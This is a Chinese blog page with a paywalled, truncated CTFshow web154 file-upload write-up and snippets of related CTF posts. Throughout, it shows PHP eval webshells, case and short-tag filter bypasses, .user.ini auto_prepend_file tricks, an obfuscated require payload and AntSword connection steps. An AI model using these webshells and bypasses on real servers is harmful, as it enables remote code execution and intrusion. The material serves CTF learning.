CTFshow 文件上传 web154

最新推荐文章于 2024-12-31 12:35:13 发布
最新推荐文章于 2024-12-31 12:35:13 发布
阅读量487 收藏
点赞数
分类专栏: CTFshow 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kracxi/article/details/122950466
版权
本文详细描述了一次CTF挑战中遇到的文件上传问题。通过尝试上传含有shell的PNG文件并分析上传失败的原因,作者发现系统可能过滤了PHP相关关键字。通过使用大小写绕过过滤,成功上传了.shell.png文件。进一步,利用.user.ini文件的特性,实现了RCE(远程代码执行)。总结中强调了理解文件过滤机制和利用技巧在解决此类问题中的关键作用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

思路

上传一个包含shell的png文件,发现上传失败

在这里插入图片描述

清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过

在这里插入图片描述
shell.png

<?phP
 echo 123;pHpinfo();eval($_POST[
最低0.47元/天 解锁文章
ctfshow web入门文件上传
Npceer-一位网安初学者的博客
05-25 500
之前已经写了一部分了 补一下博客 给自己之后当笔记看看 这里写目录标题0x01 web153(前面两题懒得写博客了)0x02 web 154 0x01 web153(前面两题懒得写博客了) 首先题目环境大多是nginx 前面两题是前端验证 直接抓包改后缀就行 这次不行了 所以说到nginx我们考虑到.uer.ini (.htaccess是apache下的) 但是被挡下来了 于是上传.user.ini.png 内容是 然后抓包把后缀.png去掉 就可以 这个第一行是gif的文件头 之前写其他平台文件上传的时
CTFshow 文件上传 web163
Kradress的博客
02-16 744
目录源码思路总结 源码 思路 先上传.user.ini 上传成功 GIF89a auto_prepend_file=png 然后上传png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?> 取反脚本 $a = "dat
CTFshow web(文件上传151-154
csjjjd的博客
02-14 1263
好了,人家改题目了,告诉你不能直接前端白嫖了,那就后端把png直接改成php就好了。第一种方法也是最好用的就是直接把前端内容的png改成php就好。然后创建一个111.png文件,里面写入一句话木马。然后创建一个111.png文件,里面写入一句话木马。后缀加上upload\/111.php就好。这还不简单,换个木马不就好了嘛,刚开始还是像上面的步骤一样。接下来直接连接蚁剑就好。然后访问upload。
ctfshow-web154(文件上传)
m0_62094846的博客
01-18 967
png上传也会错误,说文件内容不合规 上传个不带木马的文件就可以 说明一句话木马中有敏感信息 使用其他短标签可以绕过 <?= eval($_POST[1]);?> <? eval($_POST[1]);?> <% eval($_POST[1]);%> 传入png的木马文件可以,但是php文件加了png文件头也没用 说明可能php确实就是不能使用 考虑使用配置文件 .user.ini 确认是否可以使用 确实可以,接下来就比较好办了 ...
ctfshow web入门 文件上传(持续更新)
Lum1n0us's Blog
03-26 506
文章目录web151-152web153web154-159web160web161 web151-152 hint是前台验证,那么直接先上传.png后缀的图片马,在burp中将.png改为.php即可,然后蚁剑连接拿到flag web153 这题我试了把后缀改为.Php .php2 .phtml 估计是服务器不解析的原因,在访问时只能把他们下载下来,因为这里是nginx,所以试了上传.user.ini,发现可行 我们指定一个文件(如a.jpg),那么该文件就会被包含在要执行的php文件中(如index.
ctfshow-web入门-文件上传web151-web160)
Welcome To Myon'Blog !
07-07 2022
试了下前端只能传 png 后缀的将一句话木马改成 png 后缀,上传后用 burpsuite 抓包绕过前端检测后,改回 php 后缀,发包拿到 flag:ctfshow{e3bd0332-4d5f-4255-941f-a2e6095c4f17}我们还可以直接改它前端验证的代码:原本只支持上传 png 后缀的文件我们加一个 php 后缀进去,即可直接上传 php 后缀的文件。
ctfshow文件包含-153~154总结
qq_62782054的博客
12-21 184
小总结,方便复盘使用。
CTFshow 文件上传 web162
Kradress的博客
02-15 2284
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
CTFshow 文件上传 web164
Kradress的博客
02-16 1117
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片 点击查看图片后,跳转到/download.php?imag
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1498
ctfshow文件上传复现保姆级笔记
ctfshow [web] 文件上传 151--155
weixin_68906365的博客
02-18 566
ctfshow文件上传151--155
CTFshow刷题日记-WEB-文件上传
Love&Share
09-08 1559
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
cftshow web学习记录(二)
weixin_52555162的博客
02-24 1098
萌新计划,这次更新web16-21 web16: 审计代码发现我们只要满足: if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){ echo $flag; 满足这一句的条件就可以: 先来看看mad5函数的作用: 这个函数使用来计算字符的MD5散列,他可以选择十六进制或者二进制输出格式 分析if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c8..
CTFshow-文件上传
qq_61376069的博客
01-22 623
CTFshow入门——文件上传
【CTF】文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 7434
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
ctfshow -web文件上传
m0_72898152的博客
02-02 1268
ctf
ctfshow web入门(文件上传)
Blazing-Angel的博客
07-19 2497
ctfshow 文件上传
ctfshow---文件上传
fainpo的博客
04-10 742
来到文件上传了。
CTFSHOW文件上传151-170
qq_68233961的博客
02-26 1343
CTFshow文件上传
ctfshow web入门文件上传蚁剑连接
最新发布
01-02
### CTFShow Web 入门 文件上传 蚁剑 (AntSword) 连接教程 #### 准备工作 为了成功完成文件上传并利用蚁剑建立连接,需先准备环境。确保已安装蚁剑客户端,并准备好用于测试的恶意PHP脚本。 #### PHP Shell Payload 创建 创建一个简单的PHP反向Shell脚本 `shell.php`: ```php <?php @eval($_POST['cmd']);?> ``` 此代码片段允许通过POST请求执行任意命令[^1]。 #### 文件上传过程 使用给定URL进行文件上传操作。假设目标地址为 `http://example.com/upload` ,则可构造如下表单数据提交至服务器: ```html <form action="http://example.com/upload" method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload File" name="submit"> </form> ``` 将之前编写的 `shell.php` 作为待上传文件选择并提交[^2]。 #### 验证上传成果 确认文件是否成功上载到远程服务器指定目录下。通常情况下,可以通过浏览器直接访问该路径来验证,例如:`http://example.com/uploads/shell.php` 。如果页面返回空白,则说明上传成功。 #### 使用蚁剑连接 启动蚁剑工具,在新建站点时输入相应的参数配置: - **网站根目录**: `/var/www/html/` - **WebShell URL**: 如前所述成功的PHP shell链接 - **密码**: 设置于PHP代码中的密钥 (`cmd`) 按照上述设置完成后点击“保存”,随后即可尝试与远端服务器建立会话连接[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值